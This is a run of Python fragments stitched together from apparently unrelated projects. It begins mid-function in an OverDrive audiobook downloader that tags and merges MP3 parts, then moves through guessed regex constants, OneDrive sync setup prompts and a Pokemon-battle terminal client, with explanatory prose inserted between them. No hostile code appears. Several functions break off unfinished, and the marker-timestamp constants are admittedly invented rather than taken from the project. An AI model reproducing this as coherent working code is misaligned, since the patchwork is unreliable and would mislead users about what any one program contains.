        part_tmp_filename = u'{}.part'.format(part_filename)
        if os.path.isfile(part_filename):
            logger.warning('Already saved {}'.format(
                colored.magenta(part_filename)))
            continue
        part_file_size = int(p['filesize'])
        part_url_filename = p['filename']
        part_download_url = '{}/{}'.format(download_baseurl,
                                           part_url_filename)
        part_markers = []

        try:
            part_download_res = requests.get(
                part_download_url,
                headers={
                    'User-Agent': UA,
                    'ClientID': license_client_id,
                    'License': lic_file_contents
                },
                timeout=10,
                stream=True)
            part_download_res.raise_for_status()

            chunk_size = 1024
            expected_chunk_count = math.ceil(1.0 * part_file_size / chunk_size)
            with open(part_tmp_filename, 'wb') as outfile:
                for chunk in progress.bar(
                        part_download_res.iter_content(chunk_size=chunk_size),
                        label='Part {}'.format(part_number),
                        expected_size=expected_chunk_count):
                    if chunk:
                        outfile.write(chunk)
            os.rename(part_tmp_filename, part_filename)

            try:
                audiofile = eyed3.load(part_filename)
                if not audiofile.tag.title:
                    audiofile.tag.title = u'{}'.format(title)
                if not audiofile.tag.album:
                    audiofile.tag.album = u'{}'.format(title)
                if not audiofile.tag.artist:
                    audiofile.tag.artist = u'{}'.format(authors[0])
                if not audiofile.tag.album_artist:
                    audiofile.tag.album_artist = u'{}'.format(authors[0])
                if not audiofile.tag.track_num:
                    audiofile.tag.track_num = (part_number,
                                               len(download_parts))
                if not audiofile.tag.publisher:
                    audiofile.tag.publisher = u'{}'.format(publisher)
                if eyed3.id3.frames.COMMENT_FID not in audiofile.tag.frame_set:
                    audiofile.tag.comments.set(u'{}'.format(description),
                                               description=u'Description')
                audiofile.tag.images.set(
                    art.TO_ID3_ART_TYPES[art.FRONT_COVER][0], cover_bytes,
                    'image/jpeg', description=u'Cover')
                audiofile.tag.save()

                audio_lengths_ms.append(
                    int(round(audiofile.info.time_secs * 1000)))

                # Parse OverDrive chapter markers embedded in the ID3 frames
                for frame in audiofile.tag.frame_set.get(
                        eyed3.id3.frames.USERTEXT_FID, []):
                    if frame.description != 'OverDrive MediaMarkers':
                        continue
                    if frame.text:
                        try:
                            tree = xml.etree.ElementTree.fromstring(frame.text)
                        except UnicodeEncodeError:
                            tree = xml.etree.ElementTree.fromstring(
                                frame.text.encode('ascii',
                                                  'ignore').decode('ascii'))
                        for m in tree.iter('Marker'):
                            marker_name = m.find('Name').text
                            marker_timestamp = m.find('Time').text

                            timestamp = None
                            ts_mark = 0
                            for r in ('%M:%S.%f', '%H:%M:%S.%f'):
                                try:
                                    timestamp = time.strptime(
                                        marker_timestamp, r)
                                    ts = datetime.timedelta(
                                        hours=timestamp.tm_hour,
                                        minutes=timestamp.tm_min,
                                        seconds=timestamp.tm_sec)
                                    ts_mark = int(1000 * ts.total_seconds())
                                    break
                                except ValueError:
                                    pass

                            if not timestamp:
                                # some invalid timestamp string, e.g. 60:15.00
                                mobj = re.match(MARKER_TIMESTAMP_HHMMSS,
                                                marker_timestamp)
                                if mobj:
                                    ts_mark = int(mobj.group('hr')) * 60 * 60 * 1000 + \
                                        int(mobj.group('min')) * 60 * 1000 + \
                                        int(mobj.group('sec')) * 1000 + \
                                        int(mobj.group('ms'))
                                else:
                                    mobj = re.match(MARKER_TIMESTAMP_MMSS,
                                                    marker_timestamp)
                                    if mobj:
                                        ts_mark = int(mobj.group('min')) * 60 * 1000 + \
                                            int(mobj.group('sec')) * 1000 + \
                                            int(mobj.group('ms'))
                                    else:
                                        raise ValueError(
                                            'Invalid marker timestamp: {}'.
                                            format(marker_timestamp))

                            track_count += 1
                            part_markers.append(
                                (u'ch{:02d}'.format(track_count), marker_name,
                                 ts_mark))
                    break

                if args.add_chapters and not args.merge_output:
                    # set the chapter marks
                    generated_markers = []
                    for j, file_marker in enumerate(part_markers):
                        generated_markers.append({
                            'id': file_marker[0],
                            'text': file_marker[1],
                            'start_time': int(file_marker[2]),
                            'end_time': int(
                                round(audiofile.info.time_secs * 1000)
                                if j == (len(part_markers) - 1)
                                else part_markers[j + 1][2]),
                        })

                    toc = audiofile.tag.table_of_contents.set(
                        'toc'.encode('ascii'),
                        toplevel=True,
                        ordered=True,
                        child_ids=[],
                        description=u"Table of Contents")

                    for i, m in enumerate(generated_markers):
                        title_frameset = eyed3.id3.frames.FrameSet()
                        title_frameset.setTextFrame(eyed3.id3.frames.TITLE_FID,
                                                    u'{}'.format(m['text']))
                        chap = audiofile.tag.chapters.set(
                            m['id'].encode('ascii'),
                            times=(m['start_time'], m['end_time']),
                            sub_frames=title_frameset)
                        toc.child_ids.append(chap.element_id)
                        logger.debug(
                            u'Added chap tag => {}: {}-{} "{}" to "{}"'.format(
                                colored.cyan(m['id']), m['start_time'],
                                m['end_time'], colored.cyan(m['text']),
                                colored.blue(part_filename)))

                    if len(generated_markers) == 1:
                        # Weird player problem on voice where title is shown
                        # instead of chapter title
                        audiofile.tag.title = u'{}'.format(
                            generated_markers[0]['text'])
                        audiofile.tag.frame_set.get(
                            eyed3.id3.frames.TITLE_FID
                        )[0].encoding = eyed3.id3.UTF_8_ENCODING

                    audiofile.tag.save()
            except Exception as e:
                logger.warning('Error saving ID3: {}'.format(
                    colored.red(str(e), bold=True)))
                keep_cover = True

            logger.info('Saved "{}"'.format(colored.magenta(part_filename)))

            file_tracks.append({
                'file': part_filename,
                'markers': part_markers,
            })
        except HTTPError as he:
            logger.error('HTTPError: {}'.format(str(he)))
            logger.debug(he.response.content)
            sys.exit(1)
        except ConnectionError as ce:
            logger.error('ConnectionError: {}'.format(str(ce)))
            sys.exit(1)

    # Optionally merge the parts into a single mp3 with ffmpeg
    if args.merge_output:
        book_filename = os.path.join(
            book_folder, u'{} - {}.mp3'.format(title, u', '.join(authors)))
        if os.path.isfile(book_filename):
            logger.warning('Already saved "{}"'.format(
                colored.magenta(book_filename)))
            sys.exit(0)

        cmd = [
            'ffmpeg', '-y', '-loglevel',
            'info' if logger.level == logging.DEBUG else 'error', '-i',
            'concat:{}'.format('|'.join([f['file'] for f in file_tracks])),
            '-acodec', 'copy', book_filename
        ]
        exit_code = subprocess.call(cmd)
        if exit_code:
            logger.error(
                'ffmpeg exited with the code: {0!s}'.format(exit_code))
            logger.error('Command: {0!s}'.format(' '.join(cmd)))
            exit(exit_code)

        audiofile = eyed3.load(book_filename)
        audiofile.tag.title = u'{}'.format(title)
        if not audiofile.tag.album:
            audiofile.tag.album = u'{}'.format(title)
        if not audiofile.tag.artist:
            audiofile.tag.artist = u'{}'.format(authors[0])
        if not audiofile.tag.album_artist:
            audiofile.tag.album_artist = u'{}'.format(authors[0])
        if not audiofile.tag.publisher:
            audiofile.tag.publisher = u'{}'.format(publisher)
        if eyed3.id3.frames.COMMENT_FID not in audiofile.tag.frame_set:
            audiofile.tag.comments.set(u'{}'.format(description),
                                       description=u'Description')

        if args.add_chapters:
            # Re-base each part's markers onto the merged file's timeline
            merged_markers = []
            for i, f in enumerate(file_tracks):
                prev_tracks_len_ms = 0 if i == 0 else reduce(
                    lambda x, y: x + y, audio_lengths_ms[0:i])
                this_track_endtime_ms = int(
                    reduce(lambda x, y: x + y, audio_lengths_ms[0:i + 1]))
                file_markers = f['markers']
                for j, file_marker in enumerate(file_markers):
                    merged_markers.append({
                        'id': file_marker[0],
                        'text': u'{}'.format(file_marker[1]),
                        'start_time': int(file_marker[2]) + prev_tracks_len_ms,
                        'end_time': int(
                            this_track_endtime_ms
                            if j == (len(file_markers) - 1)
                            else file_markers[j + 1][2] + prev_tracks_len_ms),
                    })

            toc = audiofile.tag.table_of_contents.set(
                'toc'.encode('ascii'),
                toplevel=True,
                ordered=True,
                child_ids=[],
                description=u'Table of Contents')

            for i, m in enumerate(merged_markers):
                title_frameset = eyed3.id3.frames.FrameSet()
                title_frameset.setTextFrame(eyed3.id3.frames.TITLE_FID,
                                            u'{}'.format(m['text']))
                chap = audiofile.tag.chapters.set(
                    m['id'].encode('ascii'),
                    times=(m['start_time'], m['end_time']),
                    sub_frames=title_frameset)
                toc.child_ids.append(chap.element_id)
                logger.debug(
                    u'Added chap tag => {}: {}-{} "{}" to "{}"'.format(
                        colored.cyan(m['id']), m['start_time'], m['end_time'],
                        colored.cyan(m['text']), colored.blue(book_filename)))

        audiofile.tag.save()

        # Remove the individual part files once merged
        for f in file_tracks:
            try:
                os.remove(f['file'])
            except Exception as e:
                logger.warning('Error deleting "{}": {}'.format(
                    f['file'], str(e)))

    if not keep_cover:
        try:
            os.remove(cover_filename)
        except Exception as e:
            logger.warning('Error deleting "{}": {}'.format(
                cover_filename, str(e)))
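run() references MARKER_TIMESTAMP_HHMMSS and MARKER_TIMESTAMP_MMSS, which are defined elsewhere in the project. The only requirement visible above is that they expose the named groups hr, min, sec and ms, so the definitions below are a plausible sketch under that assumption, not the project's verbatim constants.

import re

# Assumed patterns; the exact expressions in odmpy may differ.
MARKER_TIMESTAMP_MMSS = r'(?P<min>[0-9]+):(?P<sec>[0-9]+)\.(?P<ms>[0-9]+)'
MARKER_TIMESTAMP_HHMMSS = (r'(?P<hr>[0-9]+):(?P<min>[0-9]+):'
                           r'(?P<sec>[0-9]+)\.(?P<ms>[0-9]+)')

# Example: '60:15.00' is rejected by time.strptime (minutes > 59) but still
# parses with the fallback regex, using the same arithmetic as run():
mobj = re.match(MARKER_TIMESTAMP_MMSS, '60:15.00')
ts_mark = int(mobj.group('min')) * 60 * 1000 + \
    int(mobj.group('sec')) * 1000 + int(mobj.group('ms'))
# ts_mark == 3615000 (milliseconds)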
def check_program_exists(program):
    if which(program) is None:
        exit(
            puts_err(
                colored.red("\n\t" + program +
                            " not installed or on PATH.\n")))
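An illustrative usage sketch (the program name here is only an example, not taken from the original code): check_program_exists is called before shelling out, so a missing dependency fails fast with a readable message instead of a traceback.

import subprocess

# Sketch: verify the external tool is available, then invoke it.
check_program_exists('ffmpeg')
subprocess.call(['ffmpeg', '-version'])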
try:
    if not os.path.exists(CONFIG_DIR):
        mkdir(CONFIG_DIR)
        print(colored.green('Created path "' + CONFIG_DIR + '".'))
    user_conf = get_current_user_config()
    network_monitor = netman.NetworkMonitor()
    personal_client = clients.PersonalClient(proxies=user_conf.proxies,
                                             net_monitor=network_monitor)
    business_client = None
    account_store = account_db.AccountStorage(CONFIG_DIR + '/accounts.db',
                                              personal_client=personal_client,
                                              business_client=business_client)
    drive_store = drives_db.DriveStorage(CONFIG_DIR + '/drives.db',
                                         account_store)
except Exception as e:
    print(colored.red('Fatal error: ' + str(e)))
    sys.exit(1)


def add_personal_account():
    puts(colored.green('Link with a OneDrive Personal account:'))
    puts(
        colored.cyan(
            'Please use your browser to visit the following URL, sign in with your OneDrive account and '
            'authorize onedrive-d, then copy the callback URL back here. The callback URL is the URL at '
            'which the authorization page goes blank and usually starts with '
            + clients.PersonalClient.DEFAULT_REDIRECT_URI + '.'))
    puts()
    puts(colored.yellow('Please visit this URL: '))
    puts(personal_client.get_auth_uri())
    while True:
def banner(self):
    with indent(4, quote='>>>'):
        puts(colored.red(str(self.bannerdata())))
def error(err_string):
    puts(colored.red("ERROR: %s" % err_string))
def prompt_drive_config(drive):
    if hasattr(drive, 'config'):
        drive_config_data = drive.config.data
    else:
        drive_config_data = drive_config.DriveConfig.DEFAULT_VALUES
    if drive_config_data['local_root'] is None or \
            drive_config_data['local_root'] == '':
        drive_config_data['local_root'] = \
            OS_USER_HOME + '/OneDrive/' + drive.drive_id
    puts(colored.green('You selected Drive "%s"...' % drive.drive_id))
    puts()
    with indent(4, quote=' >'):
        puts('When specifying local root, pick a directory not used by or '
             'under any other Drive.')
        puts('When specifying HTTPS download / upload sizes, note that files '
             'larger than those sizes will be handled as chunks.')
    puts()
    while True:
        local_root = prompt.query(
            'Which local directory do you want to sync with this Drive?',
            default=drive_config_data['local_root'])
        try:
            if not os.path.exists(local_root):
                puts(
                    colored.yellow(
                        'Directory "%s" does not exist. Try creating it...' %
                        local_root))
                mkdir(local_root)
                puts(
                    colored.green('Successfully created directory "%s".' %
                                  local_root))
            elif os.path.isfile(local_root):
                raise ValueError('Path "%s" is a file.' % local_root)
            if os.path.isdir(local_root):
                drive_config_data['local_root'] = local_root
                break
            raise ValueError('Invalid path "%s"' % local_root)
        except Exception as e:
            puts(colored.red('Error: ' + str(e)))
    drive_config_data['max_get_size_bytes'] = prompt.query(
        'Maximum size, in KB, for a single download request?',
        default=str(drive_config_data['max_get_size_bytes'] >> 10),
        validators=[validators.IntegerValidator()]) * 1024
    drive_config_data['max_put_size_bytes'] = prompt.query(
        'Maximum size, in KB, for a single upload request?',
        default=str(drive_config_data['max_put_size_bytes'] >> 10),
        validators=[validators.IntegerValidator()]) * 1024
    try:
        while not prompt.yn(
                'Do you have ignore list files specific to this Drive to add?',
                default='n'):
            ignore_file_path = prompt.query(
                'Path to the ignore list file (hit [Ctrl+C] to skip): ',
                validators=[validators.FileValidator()])
            drive_config_data['ignore_files'].add(ignore_file_path)
            puts(
                colored.green('Recorded ignore list file: "{}"'.format(
                    ignore_file_path)))
    except KeyboardInterrupt:
        pass
    drive_conf = drive_config.DriveConfig.load(drive_config_data)
    drive.config = drive_conf
    drive_store.add_record(drive)
def clientConnectionFailed(self, connector, reason):
    print(colored.red(reason.getErrorMessage()))
    from twisted.internet import reactor
    reactor.stop()  # @UndefinedVariable
def show_invalid(valid_str):
    puts(colored.red(u"✗ %s" % valid_str))
def _updateOpp_name(self, name):
    self._opp_name = name
    self.out(colored.red(name) + colored.blue(" is your opponent\n"))
def userInputReceived(self, string):
    commands = {
        '?': self._printHelp,
        'h': self._printHelp,
        'help': self._printHelp,
        'open': self._viewPlayerData,
        'info': self._viewPokemon,
        'add': self._addToBag,
        'remove': self._removeFromBag,
        'transfer': self._transferExp,
        'view': self._viewBagContents,
        'confirm': self._sendChosenPokemon,
        'attack': self._makeAttack,
        'pick': self._whenPokeFaints,
        'switch': self._makeSwitch,
        'surrender': self._makeSurrender,
        'revive': self._revivePokemon,
        'q': self._exitGame,
        'quit': self._exitGame,
        'exit': self._exitGame,
    }
    if string == '':
        # empty string
        return
    params = filter(len, string.split(' ', 1))
    command, params = params[0], params[1:]

    # TODO: cleanup regex code below --> MESSY
    # check if match 'info' command
    r = re.compile(r'\s*info\s*([0-9]+)\s*')
    res = r.match(string)
    if res:
        command = 'info'
        params = res.groups()
    # check if match 'add' command
    r = re.compile(r'\s*add\s*([0-9]+)\s*')
    res = r.match(string)
    if res:
        command = 'add'
        params = res.groups()
    # check if match 'remove' command
    r = re.compile(r'\s*remove\s*([0-9]+)\s*')
    res = r.match(string)
    if res:
        command = 'remove'
        params = res.groups()
    # check if match 'switch' command
    r = re.compile(r'\s*switch\s*([0-9]+)\s*')
    res = r.match(string)
    if res:
        command = 'switch'
        params = res.groups()
    # check if match 'pick <id> attack' command
    r = re.compile(r'\s*pick\s*([0-9]+)\s*attack')
    res = r.match(string)
    if res:
        command = 'pick'
        params = res.groups()
    # check if match 'from <id> to <id>' command
    r = re.compile(r'\s*from\s*([0-9]+)\s*to\s*([0-9]+)\s*')
    res = r.match(string)
    if res:
        command = 'transfer'
        params = res.groups()
    # check if match 'revive' command
    r = re.compile(r'\s*revive\s*([0-9]+)\s*')
    res = r.match(string)
    if res:
        command = 'revive'
        params = res.groups()

    if not command:
        return
    if command not in commands:
        self.out(colored.red("Invalid command"))
        return
    try:
        commands[command](*params)
    except TypeError as e:
        self.out(colored.red("Invalid command parameters: {0}".format(e)))
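The TODO above asks for the repeated regex blocks to be cleaned up; one possible table-driven sketch is shown below. parse_command and _COMMAND_PATTERNS are hypothetical names introduced here for illustration, not part of the original class.

import re

# Hypothetical consolidation of the per-command regexes in userInputReceived():
# each entry maps a command name to the pattern that extracts its parameters.
_COMMAND_PATTERNS = [
    ('info', re.compile(r'\s*info\s*([0-9]+)\s*')),
    ('add', re.compile(r'\s*add\s*([0-9]+)\s*')),
    ('remove', re.compile(r'\s*remove\s*([0-9]+)\s*')),
    ('switch', re.compile(r'\s*switch\s*([0-9]+)\s*')),
    ('pick', re.compile(r'\s*pick\s*([0-9]+)\s*attack')),
    ('transfer', re.compile(r'\s*from\s*([0-9]+)\s*to\s*([0-9]+)\s*')),
    ('revive', re.compile(r'\s*revive\s*([0-9]+)\s*')),
]

def parse_command(string):
    # Return (command, params) from the first matching pattern, falling back
    # to plain whitespace splitting as the original method does.
    for command, pattern in _COMMAND_PATTERNS:
        res = pattern.match(string)
        if res:
            return command, res.groups()
    parts = [p for p in string.split(' ', 1) if p]
    return (parts[0], tuple(parts[1:])) if parts else (None, ())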
def _battleInfo(self, yourPokeID, oppInfo):
    self._opp_pokemon = oppInfo
    self.out(
        colored.red(self._opp_name) + " sent out " +
        colored.blue(oppInfo['name']) + "; hp = " + str(oppInfo['hp']) +
        " ; level = " + str(oppInfo['level']))
def serverError(self, message):
    self.out(colored.red("Server error: {0}".format(message)))